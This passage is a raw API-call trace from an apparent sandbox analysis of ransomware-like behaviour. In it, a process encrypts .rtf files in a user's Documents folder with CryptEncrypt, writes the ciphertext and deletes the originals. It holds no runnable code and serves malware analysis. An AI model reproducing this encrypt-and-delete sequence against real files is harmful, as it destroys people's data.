pdwDataLen=0x144de30*=0x157e0) returned 1 [0082.685] CharLowerBuffW (in: lpsz="byte[88033]", cchLength=0xb | out: lpsz="byte[88033]") returned 0xb [0082.687] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.687] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3d40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0082.688] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48f0048*, pdwDataLen=0x144de30*=0x157d3, dwBufLen=0x157e0 | out: pbData=0x48f0048*, pdwDataLen=0x144de30*=0x157e0) returned 1 [0082.689] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0082.689] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0082.689] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.691] WriteFile (in: hFile=0x298, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x157e0, lpNumberOfBytesWritten=0x144e834, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144e834*=0x157e0, lpOverlapped=0x0) returned 1 [0082.693] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0082.693] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.693] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0082.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43c3668, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0082.694] CryptDestroyKey (hKey=0x41ac780) returned 1 [0082.694] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0082.694] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0082.694] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.694] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0082.694] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0082.694] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.694] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.694] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0082.694] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0082.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0082.694] CryptReleaseContext (hProv=0x41a4fa8, dwFlags=0x0) returned 1 [0082.694] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.694] FreeLibrary (hLibModule=0x756e0000) returned 1 [0082.694] CloseHandle (hObject=0x258) returned 1 [0082.694] CloseHandle (hObject=0x298) returned 1 [0082.713] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\F0N0.rtf", nBufferLength=0x7fff, lpBuffer=0x143e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\F0N0.rtf", lpFilePart=0x0) returned 0x4e [0082.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8628 [0082.713] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\F0N0.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\f0n0.rtf")) returned 0x20 [0082.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0082.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0082.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0082.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0082.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0082.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0082.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0082.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0082.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0082.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0082.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a84d8 [0082.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0082.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4051040 [0082.714] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\F0N0.rtf", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeefb1990, ftCreationTime.dwHighDateTime=0x1d5f049, ftLastAccessTime.dwLowDateTime=0x2b265b0, ftLastAccessTime.dwHighDateTime=0x1d5ec12, ftLastWriteTime.dwLowDateTime=0x2b265b0, ftLastWriteTime.dwHighDateTime=0x1d5ec12, nFileSizeHigh=0x0, nFileSizeLow=0x157d3, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="F0N0.rtf", cAlternateFileName="")) returned 0x41ac500 [0082.714] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\F0N0.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\f0n0.rtf")) returned 1 [0082.722] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeefb1990, ftCreationTime.dwHighDateTime=0x1d5f049, ftLastAccessTime.dwLowDateTime=0x2b265b0, ftLastAccessTime.dwHighDateTime=0x1d5ec12, ftLastWriteTime.dwLowDateTime=0x2b265b0, ftLastWriteTime.dwHighDateTime=0x1d5ec12, nFileSizeHigh=0x0, nFileSizeLow=0x157d3, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="F0N0.rtf", cAlternateFileName="")) returned 0 [0082.723] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0082.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4051040 | out: hHeap=0x1780000) returned 1 [0082.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0082.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a8628 | out: hHeap=0x1780000) returned 1 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0082.724] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0082.724] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ccec8 | out: hHeap=0x1780000) returned 1 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0082.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0082.724] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0082.724] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0082.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0082.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0082.725] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0082.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0082.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0082.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0082.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a20 [0082.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0082.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0082.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0082.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0082.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0082.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0082.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0082.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0082.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0082.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0082.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0082.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0082.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x170) returned 0x43ccec8 [0082.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0082.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0082.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0082.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0082.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0082.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf10 [0082.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0082.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0082.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0082.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0082.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0082.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0082.726] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0082.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0082.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0082.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0082.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.726] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0082.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0082.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0082.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0082.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0082.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.727] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\HUjUtG60c TddWcmy.rtf", lpFindFileData=0x144e718 | out: lpFindFileData=0x144e718*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66e55450, ftCreationTime.dwHighDateTime=0x1d5f10a, ftLastAccessTime.dwLowDateTime=0x54035490, ftLastAccessTime.dwHighDateTime=0x1d5e6d3, ftLastWriteTime.dwLowDateTime=0x54035490, ftLastWriteTime.dwHighDateTime=0x1d5e6d3, nFileSizeHigh=0x0, nFileSizeLow=0x16ff1, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="HUjUtG60c TddWcmy.rtf", cAlternateFileName="HUJUTG~1.RTF")) returned 0x41ac440 [0082.727] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0082.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0082.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0082.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0082.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0082.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0082.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0082.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0082.727] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0082.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0082.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0082.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0082.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29e0 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0082.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafe8 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0082.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0082.728] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0082.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0082.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0082.728] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0082.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0082.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29f0 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0082.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2ac0 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0082.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2980 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0082.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae68 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0082.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0082.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0082.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0082.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0082.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0082.730] HeapFree (in: 